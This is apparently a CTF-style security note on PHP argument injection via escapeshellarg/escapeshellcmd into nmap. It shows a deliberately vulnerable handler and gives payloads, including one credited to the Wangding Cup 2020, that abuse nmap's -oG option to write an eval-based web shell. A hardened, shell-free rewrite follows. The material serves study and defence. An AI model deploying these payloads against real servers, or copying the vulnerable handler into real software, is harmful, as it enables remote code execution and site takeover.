Argument injection
References
https://www.leavesongs.com/PENETRATION/escapeshellarg-and-parameter-injection.html
https://www.anquanke.com/post/id/107336
https://paper.seebug.org/164/
nmap argument injection
<?php
// Trust a client-supplied X-Forwarded-For header as the client address
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if (!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    // escapeshellarg() followed by escapeshellcmd(): the combination discussed here
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    // Per-client working directory, created relative to the script's directory
    $sandbox = md5("glzjin" . $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox ' . $sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F " . $host);
}
?>
The -oG option (write grepable output to a named file):
payload: ?host=' <?php @eval($_POST["hack"]);?> -oG shell.php '
nmap -T5 -sT -Pn --host-timeout 2 -F <?php @eval($_POST["hack"]);?> -oG shell.php
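A hardened version of the handler above, as an added example that is not part of the original challenge code: the host is validated against an allow-list pattern and nmap is started without a shell. It assumes PHP 7.4 or later on a POSIX host; scan_target() and run_scan() are hypothetical helper names, and the sample inputs are constructed.

```php
<?php
// Added example, not the challenge's code. Assumes PHP >= 7.4 (array form of
// proc_open). scan_target() and run_scan() are hypothetical helper names.

// Allow only an IPv4 literal or an RFC 1123 hostname. A value that starts
// with '-' or contains spaces, quotes or shell metacharacters is rejected,
// so nmap can never read it as an option such as -oG.
function scan_target(string $host): ?string
{
    if (filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        return $host;
    }
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    $re = '/\A' . $label . '(?:\.' . $label . ')*\z/';
    return (strlen($host) <= 253 && preg_match($re, $host) === 1) ? $host : null;
}

function run_scan(string $host): string
{
    // Each array element reaches nmap as exactly one argv entry; no /bin/sh is
    // started, so escapeshellarg()/escapeshellcmd() are not needed at all.
    $cmd  = ['nmap', '-T5', '-sT', '-Pn', '--host-timeout', '2', '-F', $host];
    $desc = [1 => ['pipe', 'w'], 2 => ['file', '/dev/null', 'w']];
    // Working directory outside the web root, unlike the per-client sandbox.
    $proc = proc_open($cmd, $desc, $pipes, sys_get_temp_dir());
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start nmap');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return (string) $out;
}

if (PHP_SAPI === 'cli') {
    // Constructed sample inputs: validation only, nmap is not executed.
    foreach (['192.0.2.10', 'scan.example.test', "' -oG shell.php '", '-oG'] as $in) {
        printf("%-22s %s\n", var_export($in, true), scan_target($in) === null ? 'rejected' : 'accepted');
    }
} else {
    $raw  = $_GET['host'] ?? '';
    $host = is_string($raw) ? scan_target($raw) : null;
    if ($host === null) {
        http_response_code(400);
        exit('invalid host');
    }
    echo htmlspecialchars(run_scan($host), ENT_QUOTES);
}
```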
[Wangding Cup 2020, Zhuque Group] Nmap
payload ' <?=eval($_POST["hack"]);?> -oG shell.phtml '